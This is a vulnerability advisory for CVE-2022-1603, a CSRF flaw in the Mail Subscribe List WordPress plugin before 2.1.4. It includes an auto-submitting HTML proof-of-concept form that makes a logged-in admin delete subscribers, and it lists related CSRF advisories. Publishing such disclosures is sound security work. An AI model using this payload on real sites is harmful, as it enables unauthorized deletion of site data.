Mail Subscribe List < 2.1.4 – Arbitrary Subscribed User Deletion via CSRF | CVE 2022-1603 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when deleting subscribed users, which could allow attackers to make a logged in admin perform such action and delete arbitrary users from the subscribed list

Proof of Concept

<form id="test" action="https://example.com/wp-admin/admin.php?page=mail-subscribe-list/index.php" method="POST">
    <input type="text" name="sml_remove" value="1">
    <input type="text" name="rem[]" value="1">
    <input type="text" name="rem[]" value="4">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

mail-subscribe-list

Fixed in 2.1.4

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

0e12ba6f-a86f-4cc6-9013-8a15586098d0

Timeline

Publicly Published

2022-05-26 (about 2 years ago)

Added

2022-05-26 (about 2 years ago)

Last Updated

2023-02-22 (about 1 years ago)

Other

Published

Title

Published

2023-09-22

Title

DoFollow Case by Case < 3.5.0 - Email&URLs Adding to Allowlist via CSRF

Published

2023-09-29

Title

Timthumb Scanner <= 1.54 - Scan Initialisation via CSRF

Published

2015-04-02

Title

WordPress Video Gallery <= 2.8 - Multiple Cross-Site Request Forgery (CSRF)

Published

2021-06-30

Title

Journey Analytics < 1.0.13 - Unauthorised AJAX call via CSRF

Published

2021-07-28

Title

Admin Custom Login < 3.2.8 - CSRF to Stored XSS